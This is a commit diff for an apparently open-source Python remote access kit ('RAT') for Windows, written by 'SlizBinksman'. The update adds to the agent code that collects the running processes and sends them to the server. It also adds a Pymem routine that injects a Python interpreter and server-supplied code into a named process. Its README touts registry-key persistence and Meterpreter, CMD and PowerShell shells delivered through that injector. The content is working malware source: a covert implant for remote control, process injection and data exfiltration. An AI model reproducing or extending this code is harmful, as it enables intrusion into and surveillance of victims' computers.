wizardy0ga
diff --git a/‎README.md
Lines changed: 11 additions & 2 deletions b/‎README.md
Lines changed: 11 additions & 2 deletions
diff --git a/‎agent/windows_10/agent.py
Lines changed: 24 additions & 10 deletions b/‎agent/windows_10/agent.py
Lines changed: 24 additions & 10 deletions
diff --git a/‎core/Qt5/builder_guis/windows10/agent_builder_window.py
Lines changed: 1 addition & 1 deletion b/‎core/Qt5/builder_guis/windows10/agent_builder_window.py
Lines changed: 1 addition & 1 deletion
diff --git a/‎core/Qt5/handling_guis/image_display_window.py
Lines changed: 5 additions & 5 deletions b/‎core/Qt5/handling_guis/image_display_window.py
Lines changed: 5 additions & 5 deletions
@@ -24,10 +24,11 @@ If you're looking for an open-source project to abuse, Look elsewhere. The autho
 Created with Python 3.9.X  
 
 Client tested on:  
-* Windows 10
+* Windows 10 x64
+* Windows 7 Ultimate SP1 x64
 
 Server tested on:  
-* Debian  
+* Debian 
 
 # Features at release 1.0.0
 * Power Management (Shutdown/Reboot)
@@ -72,3 +73,11 @@ Server tested on:
     * Surveillance > Webcam > Snapshot
 * Various code optimizations
 * Fixed issue with agent disconnecting when server shuts down during initial handshake
+
+# Update 1.0.22
+* Tested agent on Windows 7 Ultimate SP1. Working. 
+* Re-coded task manager on client and server
+* Optimized context menu code. Menu now loads instantly
+* Tested powershell reg key peristence on Windows 7. Working.
+* Created python injector in Task Manager. Can inject python code into process's.
+* Added CMD, PS and Python Meterpreter shells to the python injector
@@ -10,7 +10,7 @@
 #             [A Remote Access Kit for Windows]
 # Author: SlizBinksman
 # Github: https://github.com/slizbinksman
-# Build:  1.0.21
+# Build:  1.0.22
 # -------------------------------------------------------------
 
 import socket
@@ -22,10 +22,11 @@
 import threading
 import struct
 import cv2
-
+import psutil
 from PIL import ImageGrab
 from time import sleep
 from cryptography.fernet import Fernet
+from pymem import Pymem
 
 SEP = '<sep>' #Create static seperator string
 BUFFER = 4096 #Create static buffer int
@@ -57,12 +58,6 @@ def get_windows_version(self):
         version_output = version_output.replace('\n','') #Replace new line with empty string
         return version_output.strip('\r')                #Strip carriage return and return the output
 
-    #Function will return the output of all running process's on the machine
-    def get_running_process(self):
-        command = subprocess.Popen(['powershell', 'get-process'],stdout=subprocess.PIPE,shell=True) #Run the command
-        com_output = command.stdout.read().decode()         #Capture, read and decode output
-        return com_output                                   #Return output
-
     #Function will get computers local ip and return it as string
     def get_local_ip(self):
         local_ip = socket.gethostbyname(socket.gethostname()) #Resolve system name
@@ -116,8 +111,17 @@ def shutdown_computer(self):
 
     #Function will send back a list of running process's to the server
     def extract_process_list(self):
-        process_list = Utilitys().get_running_process() #Get process's
-        ExfilSocket().exfil_socket_send(process_list)   #Send to server
+        process_string = ''                     # Define a local string to store information about the process's
+        for process in psutil.process_iter():   # For each process found in the running process's
+            process_name = process.name()       # Get process name
+            pid = process.pid                   # Get pid of process
+            try:
+                username = process.username()   # Get username
+            except psutil.AccessDenied:
+                username = 'NT AUTHORITY\SYSTEM' # If we are running in userland, admin process's will raise an error on call to username. manually set uname.
+            string = f'{process_name}{SEP}{str(pid)}{SEP}{username}{SEP}\n' #Create string
+            process_string += string    # Append string to local master string
+        ExfilSocket().exfil_socket_send(process_string) #Send local master string to server
 
     #Function will kill a task by the pid passed as parameter and send the output to the server
     def kill_task(self,pid):
@@ -162,6 +166,7 @@ def __init__(self):
         self.process_manager = 'proc_list'
         self.term_process = 'terminate'
         self.snapshot = 'snap_shot'
+        self.inject_python = 'inject_pie'
 
     #Function will connect to server to initiate handshake
     def connect_to_server(self):
@@ -259,6 +264,8 @@ def main(self):
                 SystemManager().kill_task(server_command[1])                          #kill the task by pid received from server
             if action_flag == self.snapshot:                                          #if the action is to send a snapshot from the webcam
                 StreamSocket().webcam_snapshot()                                      #Send a webcam snapshot
+            if action_flag == self.inject_python:                                     #If the action is to inject some python code,
+                CodeExecution().inject_and_exec(server_command[1],server_command[2])  #Inject python code
 
     #Function will retrieve all data sent by server socket
     def recv_all_data(self):
@@ -379,4 +386,11 @@ def exec_(system_command):                      #Create local exec function
                 pass
         MultiProcessor().start_child_thread_arg(exec_,system_command) #Start new thread for shell commands. Main thread will continue to communicate with server
 
+    #Function will inject a python interpreter into a process and then load
+    #Python code to be executed by it.
+    def inject_and_exec(self,process_name,python_code):
+        process = Pymem(process_name)                   #Hooke the process
+        process.inject_python_interpreter()             #Inject the python dll
+        process.inject_python_shellcode(python_code)    #Inject the python code into the code
+
 ClientSocket().connect_to_server()
@@ -10,7 +10,7 @@
 #             [A Remote Access Kit for Windows]
 # Author: SlizBinksman
 # Github: https://github.com/slizbinksman
-# Build:  1.0.21
+# Build:  1.0.22
 # -------------------------------------------------------------
 from core.logging.logging import DNSconfigs,NetworkingConfigs
 from core.builder.windows10.agent_builder import Builder
 
@@ -10,7 +10,7 @@
 #             [A Remote Access Kit for Windows]
 # Author: SlizBinksman
 # Github: https://github.com/slizbinksman
-# Build:  1.0.21
+# Build:  1.0.22
 # -------------------------------------------------------------
 import os
 
@@ -32,10 +32,10 @@ def get_image_size(self):
 
     #Function will save a file to the image_data directory with a random string for the name
     def save_raw_file(self):
-        file_path = f'{ClientPath().image_data_dir}{Scrambler().scrambleVar(7)}.jpg'
-        original_image_data = LoggingUtilitys().receive_file_bytes(DSFilePath().streaming_frame)
-        LoggingUtilitys().write_bytes_to_file(file_path,original_image_data)
-        Notifications().raise_notification(
+        file_path = f'{ClientPath().image_data_dir}{Scrambler().scrambleVar(7)}.jpg'                #Create local file path string with random string for file name
+        original_image_data = LoggingUtilitys().receive_file_bytes(DSFilePath().streaming_frame)    #Retrieve the bytes of the original image
+        LoggingUtilitys().write_bytes_to_file(file_path,original_image_data)                        #Write those bytes to a new file and save it
+        Notifications().raise_notification(                                                         #Notify the user with the name of the screenshot
             f'Saved file as {file_path}',
             'Success'
         )